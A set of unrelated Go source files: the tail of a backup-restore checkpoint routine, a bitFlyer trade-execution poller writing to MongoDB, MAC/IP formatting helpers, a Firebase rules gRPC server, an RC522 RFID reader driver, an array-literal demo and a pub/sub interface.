		exists, err := checkpoint.ExistsCheckpointTaskInfo(ctx, s, clusterID)
		if err != nil {
			return nil, false, errors.Trace(err)
		}
		if exists {
			curTaskInfo, err = checkpoint.LoadCheckpointTaskInfoForLogRestore(ctx, s, clusterID)
			if err != nil {
				return nil, false, errors.Trace(err)
			}
			// TODO: check whether user has manually modified the cluster(ddl). If so, regard the behavior
			//       as restore from scratch. (update `curTaskInfo.RewriteTs` to 0 as an uninitial value)

			// The task info is written to external storage without status `InSnapshotRestore` only when
			// id-maps is persist into external storage, so there is no need to do snapshot restore again.
			if curTaskInfo.StartTS == cfg.StartTS && curTaskInfo.RestoreTS == cfg.RestoreTS {
				// the same task, check whether skip snapshot restore
				doFullRestore = doFullRestore && (curTaskInfo.Progress == checkpoint.InSnapshotRestore)
				// update the snapshot restore task name to clean up in final
				if !doFullRestore && (len(cfg.FullBackupStorage) > 0) {
					_ = cfg.generateSnapshotRestoreTaskName(clusterID)
				}
				log.Info("the same task", zap.Bool("skip-snapshot-restore", !doFullRestore))
			} else {
				// not the same task, so overwrite the taskInfo with a new task
				log.Info("not the same task, start to restore from scratch")
				errTaskMsg = fmt.Sprintf(
					"a new task [start-ts=%d] [restored-ts=%d] while the last task info: [start-ts=%d] [restored-ts=%d] [skip-snapshot-restore=%t]",
					cfg.StartTS, cfg.RestoreTS, curTaskInfo.StartTS, curTaskInfo.RestoreTS, curTaskInfo.Progress == checkpoint.InLogRestoreAndIdMapPersist)
				curTaskInfo = nil
			}
		}
	}

	// restore full snapshot precheck.
	if doFullRestore {
		if !(cfg.UseCheckpoint && curTaskInfo != nil) {
			// Only when use checkpoint and not the first execution,
			// skip checking requirements.
			log.Info("check pitr requirements for the first execution")
			if err := checkPiTRRequirements(ctx, g, cfg, mgr); err != nil {
				// Annotate with the task-mismatch context so the operator
				// understands why this run is treated as a fresh restore.
				if len(errTaskMsg) > 0 {
					err = errors.Annotatef(err, "The current restore task is regarded as %s. "+
						"If you ensure that no changes have been made to the cluster since the last execution, "+
						"you can adjust the `start-ts` or `restored-ts` to continue with the previous execution. "+
						"Otherwise, if you want to restore from scratch, please clean the cluster at first", errTaskMsg)
				}
				return nil, false, errors.Trace(err)
			}
		}
	}

	// persist the new task info
	if cfg.UseCheckpoint && curTaskInfo == nil {
		log.Info("save checkpoint task info with `InSnapshotRestore` status")
		if err := checkpoint.SaveCheckpointTaskInfoForLogRestore(ctx, s, &checkpoint.CheckpointTaskInfoForLogRestore{
			Progress:  checkpoint.InSnapshotRestore,
			StartTS:   cfg.StartTS,
			RestoreTS: cfg.RestoreTS,
			// updated in the stage of `InLogRestoreAndIdMapPersist`
			RewriteTS:    0,
			TiFlashItems: nil,
		}, clusterID); err != nil {
			return nil, false, errors.Trace(err)
		}
	}
	return curTaskInfo, doFullRestore, nil
}
|
package main
import (
"time"
log "github.com/sirupsen/logrus"
"gopkg.in/mgo.v2"
"github.com/go-numb/go-bitflyer/auth"
"github.com/go-numb/go-bitflyer/v1"
"github.com/go-numb/go-bitflyer/v1/public/executions"
"github.com/go-numb/go-bitflyer/v1/types"
)
// main runs the execution collector for the lifetime of the process.
// getExec never returns normally (it polls forever, or exits the process via
// log.Fatal on a startup failure).
func main() {
	// The previous version launched getExec on a goroutine and then blocked
	// on a channel that nothing ever closed; calling it directly blocks the
	// same way and drops the unused channel.
	getExec()
}
// getExec polls bitFlyer for new FX_BTC_JPY executions every 5 seconds and
// stores each batch in the mongo collection bffx.executions. Startup
// failures (dial, first fetch) are fatal; later fetch/insert failures are
// logged and the loop continues.
func getExec() {
	bf := v1.NewClient(&v1.ClientOpts{
		&auth.AuthConfig{
			"", "",
		},
	})

	// NOTE(review): "http://localhost:28015" is an odd mgo dial string —
	// mgo expects host:port, mongod's default port is 27017, and 28015 is
	// RethinkDB's port. Confirm the intended database address.
	sec, err := mgo.Dial("http://localhost:28015")
	if err != nil {
		log.Fatal("mongo database can not set")
	}
	defer sec.Close()
	col := sec.DB("bffx").C("executions")

	// insertAll persists a batch; individual insert failures were previously
	// silently discarded — log them instead of dropping them.
	insertAll := func(ex []executions.Execution) {
		for _, e := range ex {
			if err := col.Insert(e); err != nil {
				log.Error(err)
			}
		}
	}

	ticker := time.NewTicker(5 * time.Second)
	defer ticker.Stop()

	// Prime the cursor with an initial fetch; a nil batch here means the API
	// is unreachable, which is fatal at startup.
	id := 0
	rid, ex := getexec(id, bf)
	if ex == nil {
		log.Fatal("gets executions data is nil")
	}
	id = rid
	insertAll(ex)

	for range ticker.C {
		rid, ex := getexec(id, bf)
		if ex == nil {
			log.Error("gets executions data is nil")
			continue
		}
		id = rid
		insertAll(ex)
	}
}
// getexec fetches up to 499 recent FX_BTC_JPY executions after the given
// execution id and returns the id to resume from next time together with the
// fetched batch. On API error it returns the input id and a nil slice.
func getexec(id int, bf *v1.Client) (int, []executions.Execution) {
	page := types.Pagination{
		Count: 499,
	}
	if id != 0 {
		page.After = id
	}
	exec, _, err := bf.Executions(&executions.Request{
		// NOTE(review): the pagination was previously built but never put in
		// the request, so every poll re-fetched the newest page. Verify that
		// executions.Request embeds types.Pagination.
		Pagination:  page,
		ProductCode: types.ProductCode("FX_BTC_JPY"),
	})
	if err != nil {
		return id, nil
	}
	ex := []executions.Execution(*exec)
	// Advance the cursor to the newest execution id seen; the old code
	// returned 0, resetting the caller's cursor on every tick.
	next := id
	for _, e := range ex {
		if e.ID > next {
			next = e.ID
		}
	}
	return next, ex
}
|
package utilities
import (
"fmt"
"strings"
)
// Mac converts a byte array to a MAC address string of colon-separated,
// zero-padded, uppercase hex octets (e.g. []byte{0x0a, 0xff} -> "0A:FF").
func Mac(data []byte) string {
	parts := make([]string, len(data))
	for i, b := range data {
		// %02X: each octet of a MAC address is conventionally two hex digits,
		// so values below 0x10 must be zero-padded ("0A", not "A" as the
		// previous %X formatting produced).
		parts[i] = fmt.Sprintf("%02X", b)
	}
	return strings.Join(parts, ":")
}
// ConvertToHex returns the uppercase hex representation of each byte in data,
// one string per byte (no zero padding, mirroring fmt's %X verb).
func ConvertToHex(data []byte) []string {
	out := make([]string, 0, len(data))
	for _, octet := range data {
		out = append(out, fmt.Sprintf("%X", octet))
	}
	return out
}
// IP renders data as a dotted-decimal address: one decimal number per byte,
// joined by dots.
func IP(data []byte) string {
	var sb strings.Builder
	for i, octet := range data {
		if i > 0 {
			sb.WriteByte('.')
		}
		fmt.Fprintf(&sb, "%d", octet)
	}
	return sb.String()
}
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
emptypb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/empty_go_proto"
alphapb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/firebaserules/alpha/firebaserules_alpha_go_proto"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/firebaserules/alpha"
)
// RulesetServer implements the gRPC interface for Ruleset. It is stateless:
// each RPC constructs its own DCL client from the request's
// service-account file (see createConfigRuleset).
type RulesetServer struct{}
// ProtoToFirebaserulesAlphaRulesetSourceLanguageEnum converts a
// RulesetSourceLanguageEnum enum from its proto representation; the zero
// value and unknown values map to nil.
func ProtoToFirebaserulesAlphaRulesetSourceLanguageEnum(e alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum) *alpha.RulesetSourceLanguageEnum {
	if e == 0 {
		return nil
	}
	name, ok := alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum_name[int32(e)]
	if !ok {
		return nil
	}
	// Strip the proto enum-name prefix to recover the bare enum value.
	converted := alpha.RulesetSourceLanguageEnum(name[len("FirebaserulesAlphaRulesetSourceLanguageEnum"):])
	return &converted
}
// ProtoToFirebaserulesAlphaRulesetSource converts a RulesetSource object from
// its proto representation.
func ProtoToFirebaserulesAlphaRulesetSource(p *alphapb.FirebaserulesAlphaRulesetSource) *alpha.RulesetSource {
	if p == nil {
		return nil
	}
	out := &alpha.RulesetSource{
		Language: ProtoToFirebaserulesAlphaRulesetSourceLanguageEnum(p.GetLanguage()),
	}
	for _, file := range p.GetFiles() {
		out.Files = append(out.Files, *ProtoToFirebaserulesAlphaRulesetSourceFiles(file))
	}
	return out
}
// ProtoToFirebaserulesAlphaRulesetSourceFiles converts a RulesetSourceFiles
// object from its proto representation.
func ProtoToFirebaserulesAlphaRulesetSourceFiles(p *alphapb.FirebaserulesAlphaRulesetSourceFiles) *alpha.RulesetSourceFiles {
	if p == nil {
		return nil
	}
	return &alpha.RulesetSourceFiles{
		Content:     dcl.StringOrNil(p.GetContent()),
		Name:        dcl.StringOrNil(p.GetName()),
		Fingerprint: dcl.StringOrNil(p.GetFingerprint()),
	}
}
// ProtoToFirebaserulesAlphaRulesetMetadata converts a RulesetMetadata object
// from its proto representation.
func ProtoToFirebaserulesAlphaRulesetMetadata(p *alphapb.FirebaserulesAlphaRulesetMetadata) *alpha.RulesetMetadata {
	if p == nil {
		return nil
	}
	out := &alpha.RulesetMetadata{}
	out.Services = append(out.Services, p.GetServices()...)
	return out
}
// ProtoToRuleset converts a Ruleset resource from its proto representation.
func ProtoToRuleset(p *alphapb.FirebaserulesAlphaRuleset) *alpha.Ruleset {
	return &alpha.Ruleset{
		Name:       dcl.StringOrNil(p.GetName()),
		Source:     ProtoToFirebaserulesAlphaRulesetSource(p.GetSource()),
		CreateTime: dcl.StringOrNil(p.GetCreateTime()),
		Metadata:   ProtoToFirebaserulesAlphaRulesetMetadata(p.GetMetadata()),
		Project:    dcl.StringOrNil(p.GetProject()),
	}
}
// FirebaserulesAlphaRulesetSourceLanguageEnumToProto converts a
// RulesetSourceLanguageEnum enum to its proto representation; nil and
// unknown values map to the proto zero value.
func FirebaserulesAlphaRulesetSourceLanguageEnumToProto(e *alpha.RulesetSourceLanguageEnum) alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum {
	if e == nil {
		return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(0)
	}
	v, ok := alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum_value["RulesetSourceLanguageEnum"+string(*e)]
	if !ok {
		return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(0)
	}
	return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(v)
}
// FirebaserulesAlphaRulesetSourceToProto converts a RulesetSource object to
// its proto representation.
func FirebaserulesAlphaRulesetSourceToProto(o *alpha.RulesetSource) *alphapb.FirebaserulesAlphaRulesetSource {
	if o == nil {
		return nil
	}
	p := &alphapb.FirebaserulesAlphaRulesetSource{}
	p.SetLanguage(FirebaserulesAlphaRulesetSourceLanguageEnumToProto(o.Language))
	files := make([]*alphapb.FirebaserulesAlphaRulesetSourceFiles, len(o.Files))
	for i := range o.Files {
		// Address the slice element directly instead of a loop-variable copy.
		files[i] = FirebaserulesAlphaRulesetSourceFilesToProto(&o.Files[i])
	}
	p.SetFiles(files)
	return p
}
// FirebaserulesAlphaRulesetSourceFilesToProto converts a RulesetSourceFiles
// object to its proto representation.
func FirebaserulesAlphaRulesetSourceFilesToProto(o *alpha.RulesetSourceFiles) *alphapb.FirebaserulesAlphaRulesetSourceFiles {
	if o == nil {
		return nil
	}
	out := &alphapb.FirebaserulesAlphaRulesetSourceFiles{}
	out.SetContent(dcl.ValueOrEmptyString(o.Content))
	out.SetName(dcl.ValueOrEmptyString(o.Name))
	out.SetFingerprint(dcl.ValueOrEmptyString(o.Fingerprint))
	return out
}
// FirebaserulesAlphaRulesetMetadataToProto converts a RulesetMetadata object
// to its proto representation.
func FirebaserulesAlphaRulesetMetadataToProto(o *alpha.RulesetMetadata) *alphapb.FirebaserulesAlphaRulesetMetadata {
	if o == nil {
		return nil
	}
	out := &alphapb.FirebaserulesAlphaRulesetMetadata{}
	services := make([]string, len(o.Services))
	copy(services, o.Services)
	out.SetServices(services)
	return out
}
// RulesetToProto converts a Ruleset resource to its proto representation.
func RulesetToProto(resource *alpha.Ruleset) *alphapb.FirebaserulesAlphaRuleset {
	out := &alphapb.FirebaserulesAlphaRuleset{}
	out.SetName(dcl.ValueOrEmptyString(resource.Name))
	out.SetSource(FirebaserulesAlphaRulesetSourceToProto(resource.Source))
	out.SetCreateTime(dcl.ValueOrEmptyString(resource.CreateTime))
	out.SetMetadata(FirebaserulesAlphaRulesetMetadataToProto(resource.Metadata))
	out.SetProject(dcl.ValueOrEmptyString(resource.Project))
	return out
}
// applyRuleset handles the gRPC request by passing it to the underlying
// Ruleset Apply() method and converting the result back to proto.
func (s *RulesetServer) applyRuleset(ctx context.Context, c *alpha.Client, request *alphapb.ApplyFirebaserulesAlphaRulesetRequest) (*alphapb.FirebaserulesAlphaRuleset, error) {
	applied, err := c.ApplyRuleset(ctx, ProtoToRuleset(request.GetResource()))
	if err != nil {
		return nil, err
	}
	return RulesetToProto(applied), nil
}
// ApplyFirebaserulesAlphaRuleset handles the gRPC request by building a
// client for the request's credentials and delegating to applyRuleset.
func (s *RulesetServer) ApplyFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.ApplyFirebaserulesAlphaRulesetRequest) (*alphapb.FirebaserulesAlphaRuleset, error) {
	client, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	return s.applyRuleset(ctx, client, request)
}
// DeleteFirebaserulesAlphaRuleset handles the gRPC request by passing it to
// the underlying Ruleset Delete() method.
func (s *RulesetServer) DeleteFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.DeleteFirebaserulesAlphaRulesetRequest) (*emptypb.Empty, error) {
	client, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	err = client.DeleteRuleset(ctx, ProtoToRuleset(request.GetResource()))
	return &emptypb.Empty{}, err
}
// ListFirebaserulesAlphaRuleset handles the gRPC request by passing it to the
// underlying RulesetList() method and converting each item to proto.
func (s *RulesetServer) ListFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.ListFirebaserulesAlphaRulesetRequest) (*alphapb.ListFirebaserulesAlphaRulesetResponse, error) {
	client, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	resources, err := client.ListRuleset(ctx, request.GetProject())
	if err != nil {
		return nil, err
	}
	var protos []*alphapb.FirebaserulesAlphaRuleset
	for _, item := range resources.Items {
		protos = append(protos, RulesetToProto(item))
	}
	resp := &alphapb.ListFirebaserulesAlphaRulesetResponse{}
	resp.SetItems(protos)
	return resp, nil
}
// createConfigRuleset builds an alpha API client authenticated with the given
// service-account credentials file.
func createConfigRuleset(ctx context.Context, serviceAccountFile string) (*alpha.Client, error) {
	// Parameter renamed from snake_case `service_account_file` to idiomatic
	// Go camelCase; parameter names are not part of the call interface.
	conf := dcl.NewConfig(dcl.WithUserAgent("dcl-test"), dcl.WithCredentialsFile(serviceAccountFile))
	return alpha.NewClient(conf), nil
}
|
package rc522
import (
"errors"
"github.com/zyxar/berry/bus"
"github.com/zyxar/berry/core"
)
// Sentinel errors returned by tag operations.
var (
	ErrNoTag        = errors.New("no tag found")    // no tag answered within the poll window
	ErrInvalidTag   = errors.New("invalid tag")     // unexpected response length or format
	ErrTagCRC       = errors.New("tag crc error")   // CRC mismatch on data read from a tag
	ErrTagCollision = errors.New("tag collision")   // collision bit reported by the reader
)
// Device is an RC522-style RFID reader attached over SPI.
type Device struct {
	dev bus.SPIBus // underlying SPI bus handle
}
// Open opens SPI channel 0 (speed argument 5000 — units depend on
// bus.OpenSPI; confirm against the berry bus package), soft-resets the
// reader and switches the antenna on.
func Open() (*Device, error) {
	dev, err := bus.OpenSPI(0, 5000, 0)
	if err != nil {
		return nil, err
	}
	d := &Device{dev}
	// NOTE(review): if Reset or EnableAntenna fails, the opened SPI handle is
	// discarded without being released — verify whether bus.SPIBus exposes a
	// close that should be called on these paths.
	if err = d.Reset(); err != nil {
		return nil, err
	}
	if err = d.EnableAntenna(); err != nil {
		return nil, err
	}
	return d, nil
}
// FindTag probes for an idle tag in the field and returns the first two
// bytes of its answer to the request.
func (id *Device) FindTag() (b []byte, err error) {
	resp, err := id.Request(PICC_REQIDL)
	if err != nil {
		return
	}
	b = resp[:2]
	return
}
// ReadTag reads tag block reg and returns its 16 data bytes.
func (id *Device) ReadTag(reg uint8) (b []byte, err error) {
	block, err := id.ReadBytes(reg)
	if err != nil {
		return
	}
	b = block[:16]
	return
}
// ReadByte reads one register over SPI. The address byte is the register
// shifted left one bit with the top bit set (set only for reads — compare
// WriteByte); the register value comes back in the second frame byte.
func (id *Device) ReadByte(reg byte) (byte, error) {
	frame := []byte{((reg << 1) & 0x7E) | 0x80, 0}
	_, err := id.dev.Read(frame)
	return frame[1], err
}
// WriteByte writes data into register reg (address byte: reg<<1, top bit
// clear to mark a write).
func (id *Device) WriteByte(reg byte, data byte) error {
	frame := []byte{(reg << 1) & 0x7E, data}
	_, err := id.dev.Write(frame)
	return err
}
// SetMask ORs mask into the current value of register reg.
func (id *Device) SetMask(reg, mask byte) error {
	cur, err := id.ReadByte(reg)
	if err != nil {
		return err
	}
	return id.WriteByte(reg, cur|mask)
}
// ClearMask clears the bits of mask in register reg.
func (id *Device) ClearMask(reg, mask byte) error {
	cur, err := id.ReadByte(reg)
	if err != nil {
		return err
	}
	return id.WriteByte(reg, cur & ^mask)
}
// Reset soft-resets the reader and reprograms its baseline configuration.
// The register values mirror a common RC522 init sequence — confirm exact
// semantics against the MFRC522 datasheet.
func (id *Device) Reset() (err error) {
	if err = id.WriteByte(CommandReg, PCD_RESETPHASE); err != nil {
		return
	}
	core.Delay(10)
	// Cycle the antenna driver bits (TxControlReg 0x03) off, then on.
	if err = id.ClearMask(TxControlReg, 0x03); err != nil {
		return
	}
	core.Delay(10)
	if err = id.SetMask(TxControlReg, 0x03); err != nil {
		return
	}
	// Timer setup: mode, prescaler, and 16-bit reload value (low then high).
	if err = id.WriteByte(TModeReg, 0x8D); err != nil {
		return
	}
	if err = id.WriteByte(TPrescalerReg, 0x3E); err != nil {
		return
	}
	if err = id.WriteByte(TReloadRegL, 30); err != nil {
		return
	}
	if err = id.WriteByte(TReloadRegH, 0); err != nil {
		return
	}
	// Transmit modulation and general mode configuration.
	if err = id.WriteByte(TxASKReg, 0x40); err != nil {
		return
	}
	if err = id.WriteByte(ModeReg, 0x3D); err != nil {
		return
	}
	// Receiver threshold, RF gain, and antenna driver conductance settings.
	if err = id.WriteByte(RxThresholdReg, 0x84); err != nil {
		return
	}
	if err = id.WriteByte(RFCfgReg, 0x68); err != nil {
		return
	}
	if err = id.WriteByte(GsNReg, 0xff); err != nil {
		return
	}
	err = id.WriteByte(CWGsCfgReg, 0x2f)
	return
}
// Command executes a reader command (PCD_AUTHENT or PCD_TRANSCEIVE) with the
// given payload: it loads data into the FIFO, starts the command, polls the
// interrupt register until completion or timeout, and — for transceive —
// returns the FIFO contents with the response bit length appended as the
// final element of r.
func (id *Device) Command(cmd uint8, data []byte) (r []byte, err error) {
	// irq: interrupt bits to enable; wait: completion bits to poll for.
	var irq, wait uint8 = 0x00, 0x00
	switch cmd {
	case PCD_AUTHENT:
		irq = 0x12
		wait = 0x10
	case PCD_TRANSCEIVE:
		irq = 0x77
		wait = 0x30
	default:
	}
	// Enable the selected interrupts (0x80 presumably inverts/enables the IRQ
	// pin — confirm against the ComIEnReg description in the datasheet).
	if err = id.WriteByte(ComIEnReg, irq|0x80); err != nil {
		return
	}
	if err = id.ClearMask(ComIrqReg, 0x80); err != nil {
		return
	}
	// Flush the FIFO, idle the reader, then load the payload byte by byte.
	if err = id.SetMask(FIFOLevelReg, 0x80); err != nil {
		return
	}
	if err = id.WriteByte(CommandReg, PCD_IDLE); err != nil {
		return
	}
	for i := 0; i < len(data); i++ {
		if err = id.WriteByte(FIFODataReg, data[i]); err != nil {
			return
		}
	}
	if err = id.WriteByte(CommandReg, cmd); err != nil {
		return
	}
	if cmd == PCD_TRANSCEIVE {
		// BitFramingReg bit 0x80 starts the transmission.
		if err = id.SetMask(BitFramingReg, 0x80); err != nil {
			return
		}
	}
	// Poll ComIrqReg until bit 0x01 or one of the wait bits rises, for at
	// most 150 iterations of 200µs (~30ms).
	n, err := id.ReadByte(ComIrqReg)
	var i int
	for i = 150; i != 0 && n&0x01 == 0 && n&wait == 0; i-- {
		core.DelayMicroseconds(200)
		if n, err = id.ReadByte(ComIrqReg); err != nil {
			return
		}
	}
	if err = id.ClearMask(BitFramingReg, 0x80); err != nil {
		return
	}
	// i == 0 means the poll loop exhausted its budget: fall through to
	// ErrInvalidTag at the bottom.
	if i != 0 {
		var pcdErr byte
		if pcdErr, err = id.ReadByte(ErrorReg); err != nil {
			return
		}
		// Any bit of 0x11 in ErrorReg aborts; 0x08 specifically means collision.
		if pcdErr&0x11 == 0 {
			if n&irq&0x01 != 0 {
				// The 0x01 bit fired before a completion bit: no tag answered.
				err = ErrNoTag
				return
			}
			if cmd == PCD_TRANSCEIVE {
				if n, err = id.ReadByte(FIFOLevelReg); err != nil {
					return
				}
				// ControlReg low 3 bits: valid bits in the last received byte
				// (0 means the whole byte is valid).
				var lastByte byte
				if lastByte, err = id.ReadByte(ControlReg); err != nil {
					return
				}
				lastByte &= 0x07
				var length byte
				if lastByte != 0 {
					length = (n-1)*8 + lastByte
				} else {
					length = n * 8
				}
				// Clamp the FIFO byte count to [1, maxLen].
				if n == 0 {
					n = 1
				}
				if n > maxLen {
					n = maxLen
				}
				// r holds the n response bytes plus the bit length at r[n].
				r = make([]byte, n+1)
				for j := byte(0); j < n; j++ {
					r[j], _ = id.ReadByte(FIFODataReg)
				}
				r[n] = length
				return
			}
		} else if pcdErr&0x08 != 0 {
			err = ErrTagCollision
			return
		}
	}
	err = ErrInvalidTag
	return
}
// calculateCrc asks the reader's CRC coprocessor to compute the CRC of p and
// returns the two result bytes (low register first).
func (id *Device) calculateCrc(p []byte) (b []byte, err error) {
	if err = id.ClearMask(DivIrqReg, 0x04); err != nil {
		return
	}
	if err = id.WriteByte(CommandReg, PCD_IDLE); err != nil {
		return
	}
	// Flush the FIFO before loading the input bytes.
	if err = id.SetMask(FIFOLevelReg, 0x80); err != nil {
		return
	}
	for i := 0; i < len(p); i++ {
		if err = id.WriteByte(FIFODataReg, p[i]); err != nil {
			return
		}
	}
	if err = id.WriteByte(CommandReg, PCD_CALCCRC); err != nil {
		return
	}
	// Busy-wait until the CRC-done bit (0x04 in DivIrqReg) rises or the
	// bounded retry budget runs out.
	var n byte
	if n, err = id.ReadByte(DivIrqReg); err != nil {
		return
	}
	for i := byte(0xFE); i != 0 && n&0x04 == 0; i-- {
		if n, err = id.ReadByte(DivIrqReg); err != nil {
			return
		}
	}
	b = make([]byte, 2)
	// Previously the error from the first result read was silently
	// overwritten by the second read; check each read separately so a bus
	// failure is reported.
	if b[0], err = id.ReadByte(CRCResultRegL); err != nil {
		return
	}
	b[1], err = id.ReadByte(CRCResultRegM)
	return
}
// EnableAntenna turns on the antenna driver bits (TxControlReg 0x03) if they
// are not already on.
func (id *Device) EnableAntenna() (err error) {
	var cur byte
	if cur, err = id.ReadByte(TxControlReg); err != nil {
		return
	}
	if cur&0x03 != 0 {
		// Drivers already enabled; nothing to do.
		return
	}
	err = id.SetMask(TxControlReg, 0x03)
	return
}
// DisableAntenna turns off the antenna driver bits (TxControlReg 0x03).
func (id *Device) DisableAntenna() error {
	return id.ClearMask(TxControlReg, 0x03)
}
// Halt sends the PICC_HALT command (completed with the coprocessor CRC) to
// put the currently selected tag to sleep.
func (id *Device) Halt() (err error) {
	frame := []byte{PICC_HALT, 0, 0, 0}
	var crc []byte
	if crc, err = id.calculateCrc(frame[:2]); err != nil {
		return
	}
	copy(frame[2:], crc)
	_, err = id.Command(PCD_TRANSCEIVE, frame)
	return
}
// Request transmits a one-byte request command (e.g. PICC_REQIDL) and
// returns the tag's 2-byte answer.
func (id *Device) Request(req uint8) (b []byte, err error) {
	// 0x07 in BitFramingReg: transmit only 7 bits of the last byte
	// (short-frame format for request commands).
	if err = id.WriteByte(BitFramingReg, 0x07); err != nil {
		return
	}
	var p = []byte{req, 0, 0}
	if p, err = id.Command(PCD_TRANSCEIVE, p[:1]); err != nil {
		return
	}
	// The final element appended by Command is the response bit length; a
	// valid answer is 0x10 = 16 bits (two bytes).
	if p[len(p)-1] != 0x10 {
		err = ErrInvalidTag
		return
	}
	b = p[:2]
	return
}
// func (id *Device) Anticoll(cascade uint8, snr []byte) (err error) {
// }
// Select sends a SELECT frame for the tag whose 4-byte serial number is snr,
// using the given cascade command byte. A response bit length other than
// 0x18 (24 bits — presumably SAK plus CRC; confirm against ISO 14443-3) is
// rejected as invalid.
func (id *Device) Select(cascade uint8, snr []byte) (err error) {
	p := make([]byte, 12)
	p[0] = cascade
	// 0x70: presumably the NVB byte for a full SELECT — confirm.
	p[1] = 0x70
	copy(p[2:6], snr)
	// Check byte: xor of the four serial-number bytes.
	p[6] = snr[0] ^ snr[1] ^ snr[2] ^ snr[3]
	var b []byte
	if b, err = id.calculateCrc(p[:7]); err != nil {
		return
	}
	copy(p[7:9], b)
	// Clear Status2Reg bit 0x08 (the bit AuthState checks after
	// authentication) before selecting.
	if err = id.ClearMask(Status2Reg, 0x08); err != nil {
		return
	}
	if b, err = id.Command(PCD_TRANSCEIVE, p[:9]); err != nil {
		return
	}
	if b[len(b)-1] != 0x18 {
		err = ErrInvalidTag
	}
	return
}
// AuthState authenticates access to block reg via the PCD_AUTHENT command.
// mode is the authentication command byte, key the 6-byte sector key and snr
// the 4-byte tag serial. Success is judged by Status2Reg bit 0x08 being set
// afterwards; when clear, ErrInvalidTag is returned.
func (id *Device) AuthState(mode, reg uint8, key, snr []byte) (err error) {
	// Frame layout: mode, block address, 6 key bytes, 4 serial bytes.
	p := make([]byte, 12)
	p[0] = mode
	p[1] = reg
	copy(p[2:8], key)
	copy(p[8:12], snr)
	if _, err = id.Command(PCD_AUTHENT, p); err != nil {
		return
	}
	// p[0] is reused as scratch for the status read.
	if p[0], err = id.ReadByte(Status2Reg); err != nil {
		return
	}
	if p[0]&0x08 == 0 {
		err = ErrInvalidTag
	}
	return
}
// ReadBytes transceives PICC_READ for block reg and returns the block's 16
// data bytes. The response is validated two ways: its trailing bit length
// must be 0x90 (144 bits = 18 bytes), and its last two bytes must match the
// coprocessor-computed CRC of the first 16.
func (id *Device) ReadBytes(reg uint8) (data []byte, err error) {
	p := []byte{PICC_READ, reg, 0, 0}
	b, err := id.calculateCrc(p[:2])
	if err != nil {
		return
	}
	copy(p[2:], b)
	if b, err = id.Command(PCD_TRANSCEIVE, p); err != nil {
		return
	}
	if b[len(b)-1] != 0x90 {
		err = ErrInvalidTag
		return
	}
	// Verify the transported CRC (bytes 16-17) against a locally computed one.
	var crc []byte
	if crc, err = id.calculateCrc(b[:16]); err != nil {
		return
	}
	if crc[0] != b[16] || crc[1] != b[17] {
		err = ErrTagCRC
		return
	}
	data = b[:16]
	return
}
// WriteBytes writes a 16-byte block (data[:16]) to tag block reg. It first
// transceives the WRITE command for the block and checks the tag's 4-bit ACK
// (low nibble 0x0A, response length 4 bits), then transceives the 16 data
// bytes followed by their CRC and checks the ACK again.
func (id *Device) WriteBytes(reg uint8, data []byte) (err error) {
	cmd := []byte{PICC_WRITE, reg, 0, 0}
	crc, err := id.calculateCrc(cmd[:2])
	if err != nil {
		return
	}
	copy(cmd[2:], crc)
	resp, err := id.Command(PCD_TRANSCEIVE, cmd)
	if err != nil {
		return
	}
	if resp[0]&0x0F != 0x0A || resp[len(resp)-1] != 4 {
		err = ErrInvalidTag
		return
	}
	// Build the 18-byte data frame (16 data bytes + 2 CRC bytes) in a
	// dedicated buffer. The previous code reused the short ACK response as
	// the frame buffer, which truncated the data and panicked on b[:16].
	frame := make([]byte, 18)
	copy(frame, data[:16])
	if crc, err = id.calculateCrc(frame[:16]); err != nil {
		return
	}
	copy(frame[16:], crc)
	if resp, err = id.Command(PCD_TRANSCEIVE, frame); err != nil {
		return
	}
	if resp[0]&0x0F != 0x0A || resp[len(resp)-1] != 4 {
		err = ErrInvalidTag
	}
	return
}
|
package demo01
import "fmt"
// ArrayLiteral demonstrates the array literal forms (zero-valued, element
// list, inferred length, indexed) and prints every element of each array.
func ArrayLiteral() {
	arr1 := [3]int8{}
	arr2 := [3]string{"A", "B", "C"}
	arr3 := [...]bool{true, false, true}
	// Indexed literal: the unkeyed 7 follows index 5 and lands at index 6.
	arr4 := [...]int{0: 1, 2: 2, 1: 3, 5: 5, 7}
	for idx := 0; idx < len(arr1); idx++ {
		fmt.Printf("arr1[%d] = %d\n", idx, arr1[idx])
	}
	for idx, s := range arr2 {
		fmt.Printf("arr2[%d] = %s\n", idx, s)
	}
	for idx, flag := range arr3 {
		fmt.Printf("arr3[%d] = %t\n", idx, flag)
	}
	for k, v := range arr4 {
		fmt.Println(k, v)
	}
}
// demo prints an array of struct literals together with their indices.
func demo() {
	type Man struct {
		name string
		age  int
	}
	people := [...]Man{{"梦航大神", 25}, {"包包", 25}}
	for idx := range people {
		fmt.Printf("%d\t%v", idx, people[idx])
	}
}
|
package exchange
import (
"io"
"sync"
"github.com/daakia/utils/distribution"
)
// Node is a pub/sub topic-tree participant: subscribers register a
// writer under a key, publishers fan data out to matching subscribers.
type Node interface {
	Subscribe(key []byte, id string, s io.Writer)
	UnSubscribe(key []byte, id string)
	Publish(key []byte, data []byte)
	//Remove(key[]byte)
}

